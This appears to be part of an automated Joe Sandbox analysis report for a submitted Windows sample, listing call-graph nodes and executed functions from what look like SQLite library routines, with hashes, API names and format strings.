7ffb0c711530 12 API calls _raise_excf 107706->107746 107708->107643 107709->107648 107710->107656 107711->107655 107712->107658 107713->107643 107714->107635 107715->107638 107716->107668 107717->107672 107718->107675 107719->107689 107720->107675 107721->107681 107722->107688 107723->107687 107724->107692 107725->107693 107726->107664 107748 7ffb0c764fe0 107727->107748 107729 7ffb0c7096c1 107734 7ffb0c7097f2 _raise_excf 107729->107734 107758 7ffb0c6fe4b0 107729->107758 107730 7ffb0c7098a9 _raise_excf 107730->107734 107784 7ffb0c711310 30 API calls _raise_excf 107730->107784 107731 7ffb0c7096e8 107731->107730 107731->107734 107735 7ffb0c7097e1 107731->107735 107777 7ffb0c764980 107731->107777 107734->107701 107735->107730 107735->107734 107736 7ffb0c709887 107735->107736 107737 7ffb0c709857 _raise_excf 107735->107737 107736->107730 107783 7ffb0c733ce0 11 API calls _raise_excf 107736->107783 107781 7ffb0c6bab90 11 API calls _raise_excf 107737->107781 107740 7ffb0c709873 107782 7ffb0c764ea0 11 API calls _raise_excf 107740->107782 107743->107701 107744->107701 107745->107701 107746->107699 107747->107698 107749 7ffb0c7652c0 _raise_excf 107748->107749 107755 7ffb0c765010 _raise_excf 107748->107755 107751 7ffb0c7650af _raise_excf 107749->107751 107785 7ffb0c78ed30 107749->107785 107751->107729 107752 7ffb0c765181 _raise_excf 107752->107751 107754 7ffb0c7651b4 _raise_excf 107752->107754 107792 7ffb0c711ee0 12 API calls _raise_excf 107752->107792 107754->107749 107754->107751 107756 7ffb0c764980 _raise_excf 21 API calls 107754->107756 107755->107749 107755->107751 107755->107752 107755->107754 107791 7ffb0c72fb50 11 API calls _raise_excf 107755->107791 107756->107749 107759 7ffb0c6fe505 107758->107759 107760 7ffb0c6fe4d2 107758->107760 107793 7ffb0c67e160 107759->107793 107807 7ffb0c698730 11 API calls _raise_excf 107760->107807 107762 7ffb0c6fe5f6 _raise_excf 107763 7ffb0c6fe4fe new[] 107762->107763 107809 7ffb0c711310 30 API calls _raise_excf 107762->107809 107763->107731 107764 7ffb0c6fe6a4 107767 7ffb0c6fe6d2 107764->107767 107770 7ffb0c6fe6bc 107764->107770 107765 7ffb0c6fe64c 107808 7ffb0c698730 11 API calls _raise_excf 107765->107808 107767->107762 107772 7ffb0c6fe6ee 107767->107772 107769 7ffb0c6fe530 _raise_excf 107769->107762 107769->107763 107769->107764 107769->107765 107801 7ffb0c718340 107770->107801 107772->107763 107773 7ffb0c6fe715 107772->107773 107810 7ffb0c72bae0 11 API calls 2 library calls 107772->107810 107811 7ffb0c69be10 11 API calls 2 library calls 107773->107811 107779 7ffb0c764995 107777->107779 107780 7ffb0c7649e5 107777->107780 107779->107780 107812 7ffb0c710b50 107779->107812 107780->107735 107781->107740 107782->107734 107783->107730 107784->107734 107787 7ffb0c78ed6d _raise_excf 107785->107787 107786 7ffb0c7a9c70 _raise_excf 30 API calls 107786->107787 107787->107786 107788 7ffb0c78edd0 _raise_excf 107787->107788 107789 7ffb0c78ee01 _raise_excf 107787->107789 107788->107751 107789->107788 107790 7ffb0c722470 _raise_excf RaiseException 107789->107790 107790->107788 107791->107752 107792->107754 107794 7ffb0c67e178 107793->107794 107795 7ffb0c715a50 11 API calls 107794->107795 107798 7ffb0c67e194 107794->107798 107799 7ffb0c7157b3 107794->107799 107795->107799 107796 7ffb0c715883 107797 7ffb0c715470 11 API calls 107796->107797 107797->107798 107798->107769 107799->107796 107799->107798 107800 7ffb0c715a10 11 API calls 107799->107800 107800->107796 107802 7ffb0c718377 107801->107802 107803 7ffb0c71836a 107801->107803 107805 7ffb0c718387 107802->107805 107806 7ffb0c6736f0 20 API calls 107802->107806 107804 7ffb0c78f510 _raise_excf 29 API calls 107803->107804 107804->107802 107805->107762 107806->107805 107807->107763 107808->107762 107809->107763 107810->107773 107811->107763 107814 7ffb0c710b60 _raise_excf 107812->107814 107813 7ffb0c761fc0 new[] 11 API calls 107815 7ffb0c710bc2 new[] 107813->107815 107814->107813 107817 7ffb0c710c47 _raise_excf 107814->107817 107815->107817 107819 7ffb0c674510 21 API calls 107815->107819 107816 7ffb0c710c41 _raise_excf 107816->107817 107818 7ffb0c684c20 _raise_excf 11 API calls 107816->107818 107817->107780 107818->107817 107819->107816

                                                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                                                              Function 00007FFB0C70F5D0 Relevance: 18.0, Strings: 14, Instructions: 540COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1579152401.00007FFB0C671000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB0C670000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579081678.00007FFB0C670000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579297011.00007FFB0C7D4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579337916.00007FFB0C80D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579354652.00007FFB0C812000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579371659.00007FFB0C813000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579392732.00007FFB0C816000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffb0c670000_nNnzvybxiy.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$2aabe05e2e8cae4847a802ee2daddc1d7413d8fc560254d93ee3e72c14685b6c$:memory:$API call with %s database connection pointer$BINARY$MATCH$NOCASE$RTRIM$automatic extension loading failed: %s$invalid$main$misuse$temp$v
                                                                                                                                                                                                                              • API String ID: 0-534082081
                                                                                                                                                                                                                              • Opcode ID: 4ecbe897bc3acc97783ba582dca2a4c78f2ca07ca2fa220f425904c735e13a8f
                                                                                                                                                                                                                              • Instruction ID: c3fce87b8e2ee9174eff3c7f5f26607dcda05a00d59bc3af3bb8843858b12614
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4ecbe897bc3acc97783ba582dca2a4c78f2ca07ca2fa220f425904c735e13a8f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 44428BE6A09B4285EBA49F79E848A7927A5FF48B88F640136DD4E477A5CF3CE445C300
                                                                                                                                                                                                                              Function 00007FFB0C722570 Relevance: 16.4, Strings: 12, Instructions: 1358COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1579152401.00007FFB0C671000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB0C670000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579081678.00007FFB0C670000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579297011.00007FFB0C7D4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579337916.00007FFB0C80D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579354652.00007FFB0C812000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579371659.00007FFB0C813000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579392732.00007FFB0C816000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffb0c670000_nNnzvybxiy.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: %!S$%s.%s$%s.%s.%s$'%s' is not a function$..%s$Expression tree is too large (maximum depth %d)$access to view "%s" prohibited$no such table: %s$no tables specified$too many columns in result set$too many references to "%s": max 65535$unsafe use of virtual table "%s"
                                                                                                                                                                                                                              • API String ID: 0-3486433936
                                                                                                                                                                                                                              • Opcode ID: e034a36cc12bd9215a9899eeb8c44c2f5c6ffbc58f4d44d84a9563eea4d82b8e
                                                                                                                                                                                                                              • Instruction ID: d36a535b9b943cd9dbc58ad28d0267d0c15302ae45bce78cf4771093530484cf
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e034a36cc12bd9215a9899eeb8c44c2f5c6ffbc58f4d44d84a9563eea4d82b8e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F6D2ABF2A09B8286EB618F35D148BB977A4FF44B94F049236DA9D077A5DF3CE4918700
                                                                                                                                                                                                                              Function 00007FFB0C674510 Relevance: 9.3, APIs: 1, Strings: 4, Instructions: 516fileCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1579152401.00007FFB0C671000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB0C670000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579081678.00007FFB0C670000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579297011.00007FFB0C7D4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579337916.00007FFB0C80D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579354652.00007FFB0C812000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579371659.00007FFB0C813000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579392732.00007FFB0C816000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffb0c670000_nNnzvybxiy.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateFile
                                                                                                                                                                                                                              • String ID: delayed %dms for lock/sharing conflict at line %d$exclusive$psow$winOpen
                                                                                                                                                                                                                              • API String ID: 823142352-3829269058
                                                                                                                                                                                                                              • Opcode ID: 9648a8e1b34e6d54a88f7339791b418315a19169b265df44462c620f0c7b9da4
                                                                                                                                                                                                                              • Instruction ID: 6c8b9ab7b465e8f6dfa14b0ae882987decd9d075ebd6bfb2625269ec04c6df7b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9648a8e1b34e6d54a88f7339791b418315a19169b265df44462c620f0c7b9da4
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 513271E1A09B4686FB658B35E84CB3567E0BF45BA4F249B35EA5D036E4DF3CE4448B00
                                                                                                                                                                                                                              Function 00007FFB0C72DF40 Relevance: 1.8, Strings: 1, Instructions: 553COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1579152401.00007FFB0C671000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB0C670000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579081678.00007FFB0C670000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579297011.00007FFB0C7D4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579337916.00007FFB0C80D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579354652.00007FFB0C812000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579371659.00007FFB0C813000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579392732.00007FFB0C816000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffb0c670000_nNnzvybxiy.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: :memory:
                                                                                                                                                                                                                              • API String ID: 0-2920599690
                                                                                                                                                                                                                              • Opcode ID: bad3a322da7ddd70a11fef03fe72386b6c13d9ab35f0f024c8c279fdf6b098db
                                                                                                                                                                                                                              • Instruction ID: eeb78348fb3593f0b200c1fc6fd933347d519ea77a41a8f74780080166b1dece
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bad3a322da7ddd70a11fef03fe72386b6c13d9ab35f0f024c8c279fdf6b098db
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1832AAE2A09B8286EB648F36D458B7967A0FF89B85F154535DE8D43791EF3CE491C300
                                                                                                                                                                                                                              Function 00007FFB0C79BE70 Relevance: 1.7, APIs: 1, Instructions: 224COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1579152401.00007FFB0C671000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB0C670000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579081678.00007FFB0C670000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579297011.00007FFB0C7D4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579337916.00007FFB0C80D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579354652.00007FFB0C812000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579371659.00007FFB0C813000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579392732.00007FFB0C816000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffb0c670000_nNnzvybxiy.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: InfoSystem
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 31276548-0
                                                                                                                                                                                                                              • Opcode ID: a4e6bad04b452fc8cc7e04760665395b3d9b48427dece9289ded6bff2a09062d
                                                                                                                                                                                                                              • Instruction ID: e36d1b869c4645e7fc1b2f5f7472ee868d20b0b9b92bb9ae795b3fe978334a64
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a4e6bad04b452fc8cc7e04760665395b3d9b48427dece9289ded6bff2a09062d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 17B1C8E4A0AB0782FEA98B79E858E3522E5FF44B84F550936D95D073B0EF3CE5958304
                                                                                                                                                                                                                              Function 00007FFB0C764FE0 Relevance: .3, Instructions: 278COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1579152401.00007FFB0C671000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB0C670000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579081678.00007FFB0C670000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579297011.00007FFB0C7D4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579337916.00007FFB0C80D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579354652.00007FFB0C812000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579371659.00007FFB0C813000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579392732.00007FFB0C816000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffb0c670000_nNnzvybxiy.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 317393ef1743365a49eef31e05f6b03ef5d1b5c47fd7b020569ada7a3cf6cb0d
                                                                                                                                                                                                                              • Instruction ID: dd7c607e80725afafa74ba6bed65d2fee2eb84f49f0ccf665eeedadd53fd47e1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 317393ef1743365a49eef31e05f6b03ef5d1b5c47fd7b020569ada7a3cf6cb0d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7CC19FE2A086868AFB958F3AD448B7D27A1EF84F88F095032DE4E47795DF7CD4419340
                                                                                                                                                                                                                              Function 00007FFB0C675320 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 210fileCOMMON
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 812 7ffb0c675320-7ffb0c67534c 813 7ffb0c675361-7ffb0c67536a 812->813 814 7ffb0c67534e call 7ffb0c7b1dd0 812->814 816 7ffb0c67536c 813->816 817 7ffb0c675379-7ffb0c67537d 813->817 818 7ffb0c675353-7ffb0c675357 814->818 816->817 819 7ffb0c67537f-7ffb0c67538b call 7ffb0c7b1840 817->819 820 7ffb0c675395-7ffb0c675398 817->820 821 7ffb0c67535d 818->821 822 7ffb0c67566a-7ffb0c675676 818->822 829 7ffb0c675611-7ffb0c675614 819->829 830 7ffb0c675391 819->830 824 7ffb0c67539e-7ffb0c6753e8 820->824 825 7ffb0c675616-7ffb0c675633 820->825 821->813 833 7ffb0c67541f-7ffb0c675421 824->833 834 7ffb0c6753ea-7ffb0c6753f9 824->834 827 7ffb0c675638-7ffb0c675647 825->827 831 7ffb0c675649-7ffb0c675650 827->831 832 7ffb0c675653-7ffb0c675659 827->832 829->825 829->827 830->820 831->832 835 7ffb0c67565b 832->835 836 7ffb0c675668 832->836 837 7ffb0c675456-7ffb0c67545c 833->837 838 7ffb0c675423-7ffb0c675451 call 7ffb0c7b1a30 833->838 834->833 842 7ffb0c6753fb-7ffb0c67541d call 7ffb0c7b1a30 834->842 835->836 836->822 840 7ffb0c6754ae-7ffb0c6754c4 call 7ffb0c684be0 837->840 841 7ffb0c67545e-7ffb0c675466 837->841 845 7ffb0c6755fd-7ffb0c67560c 838->845 853 7ffb0c6754d0-7ffb0c675502 840->853 854 7ffb0c6754c6-7ffb0c6754cb 840->854 841->845 846 7ffb0c67546c-7ffb0c675470 call 7ffb0c673a80 841->846 842->833 845->829 851 7ffb0c675475-7ffb0c675479 846->851 851->840 856 7ffb0c67547b-7ffb0c6754a9 call 7ffb0c7b1a30 851->856 853->845 857 7ffb0c675508 853->857 854->845 856->845 858 7ffb0c675510-7ffb0c675539 CreateFileMappingW 857->858 860 7ffb0c67553b-7ffb0c67557f MapViewOfFile 858->860 861 7ffb0c6755b4-7ffb0c6755eb call 7ffb0c7b1a30 858->861 860->861 863 7ffb0c675581-7ffb0c6755ac 860->863 861->845 869 7ffb0c6755ed-7ffb0c6755f4 861->869 863->858 864 7ffb0c6755b2 863->864 864->845 869->845
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1579152401.00007FFB0C671000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB0C670000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579081678.00007FFB0C670000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579297011.00007FFB0C7D4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579337916.00007FFB0C80D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579354652.00007FFB0C812000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579371659.00007FFB0C813000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579392732.00007FFB0C816000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffb0c670000_nNnzvybxiy.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: File$CreateMappingView
                                                                                                                                                                                                                              • String ID: winFileSize$winShmMap1$winShmMap2$winShmMap3
                                                                                                                                                                                                                              • API String ID: 3452162329-2257004166
                                                                                                                                                                                                                              • Opcode ID: 98c65c9b1954f03cbc7f8ba50b308d85a32904e02442d46a91a2686d4563fd01
                                                                                                                                                                                                                              • Instruction ID: 25d5eb1284086a21e37289ab53cfd876a633f8c1d905d2f16487c2eb88670c8b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 98c65c9b1954f03cbc7f8ba50b308d85a32904e02442d46a91a2686d4563fd01
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9F91B2F2A0974286EB658F35D808B7937A1FF84B94F558636DA4E47768DF3CE4418700
                                                                                                                                                                                                                              Function 00007FFB0C673A80 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 95COMMON
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 1088 7ffb0c673a80-7ffb0c673a9a 1089 7ffb0c673aae-7ffb0c673ab4 1088->1089 1090 7ffb0c673a9c-7ffb0c673aad 1088->1090 1091 7ffb0c673aca-7ffb0c673ad3 1089->1091 1092 7ffb0c673ab6-7ffb0c673ac7 1089->1092 1093 7ffb0c673adb 1091->1093 1094 7ffb0c673ad5-7ffb0c673ad9 1091->1094 1092->1091 1095 7ffb0c673ade-7ffb0c673b13 call 7ffb0c7b2700 SetFilePointer 1093->1095 1094->1095 1098 7ffb0c673b59-7ffb0c673b6c SetEndOfFile 1095->1098 1099 7ffb0c673b15-7ffb0c673b24 1095->1099 1100 7ffb0c673b6e-7ffb0c673b80 1098->1100 1101 7ffb0c673bab-7ffb0c673bae 1098->1101 1099->1098 1107 7ffb0c673b26-7ffb0c673b57 call 7ffb0c7b1a30 1099->1107 1100->1101 1111 7ffb0c673b82-7ffb0c673b8c 1100->1111 1102 7ffb0c673bb0-7ffb0c673bbd 1101->1102 1103 7ffb0c673bc7-7ffb0c673bdd 1101->1103 1105 7ffb0c673bc2 call 7ffb0c7b1b10 1102->1105 1106 7ffb0c673bbf 1102->1106 1105->1103 1106->1105 1113 7ffb0c673b91-7ffb0c673ba9 call 7ffb0c7b1a30 1107->1113 1111->1113 1113->1101 1113->1103
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1579152401.00007FFB0C671000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB0C670000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579081678.00007FFB0C670000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579297011.00007FFB0C7D4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579337916.00007FFB0C80D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579354652.00007FFB0C812000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579371659.00007FFB0C813000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579392732.00007FFB0C816000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffb0c670000_nNnzvybxiy.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FilePointer
                                                                                                                                                                                                                              • String ID: winSeekFile$winTruncate1$winTruncate2
                                                                                                                                                                                                                              • API String ID: 973152223-2471937615
                                                                                                                                                                                                                              • Opcode ID: bcff13c8a0a6972d2ce5bbe3d7eb2012d32025ee3e99687451907a690726906a
                                                                                                                                                                                                                              • Instruction ID: a3283e8956570fb3d321407c2a62ceac6d6ba99c616b06c20ff5481be34de0cc
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bcff13c8a0a6972d2ce5bbe3d7eb2012d32025ee3e99687451907a690726906a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1541A3E1B08B0286EB609F79E84897973A0EF44F94F244636EE5D877A8DF3CD4429700
                                                                                                                                                                                                                              Function 00007FFB0C674D70 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93fileCOMMON
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 1317 7ffb0c674d70-7ffb0c674d99 call 7ffb0c7b28d0 1320 7ffb0c674d9b-7ffb0c674da0 1317->1320 1321 7ffb0c674da5-7ffb0c674dbd GetFileAttributesW 1317->1321 1322 7ffb0c674ed1-7ffb0c674ee5 1320->1322 1323 7ffb0c674e50-7ffb0c674e65 1321->1323 1324 7ffb0c674dc3-7ffb0c674dcd 1321->1324 1327 7ffb0c674e67-7ffb0c674e87 call 7ffb0c7b1a30 1323->1327 1329 7ffb0c674e8d 1323->1329 1325 7ffb0c674dd0-7ffb0c674dd2 1324->1325 1325->1327 1328 7ffb0c674dd8-7ffb0c674dea DeleteFileW 1325->1328 1334 7ffb0c674ec2-7ffb0c674ecf call 7ffb0c684c20 1327->1334 1331 7ffb0c674e92-7ffb0c674e94 1328->1331 1332 7ffb0c674df0-7ffb0c674e03 1328->1332 1329->1331 1331->1334 1335 7ffb0c674e96-7ffb0c674ebd call 7ffb0c698730 1331->1335 1340 7ffb0c674e89-7ffb0c674e8b 1332->1340 1341 7ffb0c674e09-7ffb0c674e0f 1332->1341 1334->1322 1335->1334 1340->1327 1342 7ffb0c674e11-7ffb0c674e15 1341->1342 1343 7ffb0c674e17-7ffb0c674e1a 1341->1343 1342->1343 1345 7ffb0c674e23-7ffb0c674e4e 1342->1345 1344 7ffb0c674e1c-7ffb0c674e21 1343->1344 1343->1345 1344->1340 1344->1345 1345->1323 1345->1325
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1579152401.00007FFB0C671000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB0C670000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579081678.00007FFB0C670000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579297011.00007FFB0C7D4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579337916.00007FFB0C80D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579354652.00007FFB0C812000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579371659.00007FFB0C813000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579392732.00007FFB0C816000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffb0c670000_nNnzvybxiy.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: File$AttributesDelete
                                                                                                                                                                                                                              • String ID: delayed %dms for lock/sharing conflict at line %d$winDelete
                                                                                                                                                                                                                              • API String ID: 2910425767-1405699761
                                                                                                                                                                                                                              • Opcode ID: 13edbdd10a57c23098de7f166d5803e5bdf18e655187fc172d3a7fd25b5c1cf9
                                                                                                                                                                                                                              • Instruction ID: abfd83afd0a01a802a92fc08bc8838442a36e9e1e27eacefd9001ca197e35d3b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 13edbdd10a57c23098de7f166d5803e5bdf18e655187fc172d3a7fd25b5c1cf9
